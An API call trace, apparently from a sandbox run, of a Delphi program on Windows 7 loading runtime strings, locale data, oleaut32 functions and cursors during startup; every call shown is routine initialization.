[0086.626] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0086.626] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0086.626] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0086.626] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0086.626] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0086.626] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0086.626] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0086.627] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0086.627] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0086.627] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0086.627] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0086.627] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0086.627] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0086.627] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0086.627] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0086.627] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0086.627] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0086.627] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0086.627] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0086.627] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x14f9b0, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0086.627] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x14f9b0, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0086.627] GetVersionExA (in: lpVersionInformation=0x14fd48*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14fd48*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0086.627] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0086.627] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0086.627] GetThreadLocale () returned 0x409
[0086.627] GetThreadLocale () returned 0x409
[0086.627] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Jan") returned 4
[0086.627] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x14fc20, cchData=256 | out: lpLCData="January") returned 8
[0086.627] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Feb") returned 4
[0086.627] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x14fc20, cchData=256 | out: lpLCData="February") returned 9
[0086.627] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Mar") returned 4
[0086.627] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x14fc20, cchData=256 | out: lpLCData="March") returned 6
[0086.627] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Apr") returned 4
[0086.627] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x14fc20, cchData=256 | out: lpLCData="April") returned 6
[0086.627] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x14fc20, cchData=256 | out: lpLCData="May") returned 4
[0086.627] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x14fc20, cchData=256 | out: lpLCData="May") returned 4
[0086.627] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Jun") returned 4
[0086.627] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x14fc20, cchData=256 | out: lpLCData="June") returned 5
[0086.627] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Jul") returned 4
[0086.627] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x14fc20, cchData=256 | out: lpLCData="July") returned 5
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Aug") returned 4
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x14fc20, cchData=256 | out: lpLCData="August") returned 7
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Sep") returned 4
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x14fc20, cchData=256 | out: lpLCData="September") returned 10
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Oct") returned 4
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x14fc20, cchData=256 | out: lpLCData="October") returned 8
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Nov") returned 4
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x14fc20, cchData=256 | out: lpLCData="November") returned 9
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Dec") returned 4
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x14fc20, cchData=256 | out: lpLCData="December") returned 9
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Sun") returned 4
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Sunday") returned 7
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Mon") returned 4
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Monday") returned 7
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Tue") returned 4
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Tuesday") returned 8
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Wed") returned 4
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Wednesday") returned 10
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Thu") returned 4
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Thursday") returned 9
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Fri") returned 4
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Friday") returned 7
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Sat") returned 4
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x14fc20, cchData=256 | out: lpLCData="Saturday") returned 9
[0086.628] GetThreadLocale () returned 0x409
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x14fc7c, cchData=256 | out: lpLCData="$") returned 2
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x14fc7c, cchData=256 | out: lpLCData="0") returned 2
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x14fc7c, cchData=256 | out: lpLCData="0") returned 2
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x14fd74, cchData=2 | out: lpLCData=",") returned 2
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x14fd74, cchData=2 | out: lpLCData=".") returned 2
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x14fc7c, cchData=256 | out: lpLCData="2") returned 2
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x14fd74, cchData=2 | out: lpLCData="/") returned 2
[0086.628] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x14fc7c, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0086.628] GetThreadLocale () returned 0x409
[0086.629] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x14fc48, cchData=256 | out: lpLCData="1") returned 2
[0086.629] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x14fc7c, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0086.629] GetThreadLocale () returned 0x409
[0086.629] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x14fc48, cchData=256 | out: lpLCData="1") returned 2
[0086.629] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x14fd74, cchData=2 | out: lpLCData=":") returned 2
[0086.629] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x14fc7c, cchData=256 | out: lpLCData="AM") returned 3
[0086.629] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x14fc7c, cchData=256 | out: lpLCData="PM") returned 3
[0086.629] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x14fc7c, cchData=256 | out: lpLCData="0") returned 2
[0086.629] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x14fc7c, cchData=256 | out: lpLCData="0") returned 2
[0086.629] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x14fc7c, cchData=256 | out: lpLCData="0") returned 2
[0086.629] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x14fd74, cchData=2 | out: lpLCData=",") returned 2
[0086.629] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0086.629] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0086.629] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0086.629] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0086.629] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0086.629] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0086.629] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0086.629] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0086.629] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0086.629] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0086.630] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0086.630] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0086.630] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0086.630] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0086.630] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0086.630] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0086.630] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0086.630] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0086.630] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0086.630] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0086.630] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0086.630] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0086.630] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0086.631] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0086.631] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0086.631] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0086.631] GetDC (hWnd=0x0) returned 0x2b010799
[0086.631] GetDeviceCaps (hdc=0x2b010799, index=90) returned 96
[0086.631] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0086.631] GetDC (hWnd=0x0) returned 0x2b010799
[0086.631] GetDeviceCaps (hdc=0x2b010799, index=104) returned 0
[0086.631] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0086.631] CreatePalette (plpal=0x14f9d8) returned 0x4080835
[0086.631] GetStockObject (i=7) returned 0x1b00017
[0086.631] GetStockObject (i=5) returned 0x1900015
[0086.631] GetStockObject (i=13) returned 0x18a002e
[0086.631] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0086.631] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0086.632] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0086.632] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0086.633] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0086.634] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0086.634] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0086.634] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0086.634] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0086.634] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0086.634] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0086.634] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0086.634] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0086.634] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0086.634] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x14f9d4, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0086.634] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0086.634] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0086.634] GetVersion () returned 0x1db10106
[0086.634] GetCurrentProcessId () returned 0xf50
[0086.634] GlobalAddAtomA (lpString="Delphi00000F50") returned 0xc158
[0086.634] GetCurrentThreadId () returned 0xf54
[0086.634] GlobalAddAtomA (lpString="ControlOfs0040000000000F54") returned 0xc157
[0086.634] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000F54") returned 0xc15e
[0086.634] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0086.634] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0086.634] GetSystemMetrics (nIndex=19) returned 1
[0086.765] GetSystemMetrics (nIndex=75) returned 1
[0086.765] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x581310, fWinIni=0x0 | out: pvParam=0x581310) returned 1
[0086.765] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0086.765] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0086.765] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x101c5
[0086.766] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0086.766] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0086.766] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0086.766] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x101c7
[0086.766] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x101c9
[0086.766] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x101cb
[0086.766] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x101cd
[0086.767] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x101cf
[0086.767] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x101d1
[0086.767] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0086.767] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0086.767] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0086.767] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0086.767] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0086.767] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0086.767] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0086.767] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0086.767] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0086.767] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0086.767] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0086.767] GetDC (hWnd=0x0) returned 0x87010705
[0086.767] GetDeviceCaps (hdc=0x87010705, index=90) returned 96
[0086.768] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0086.768] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
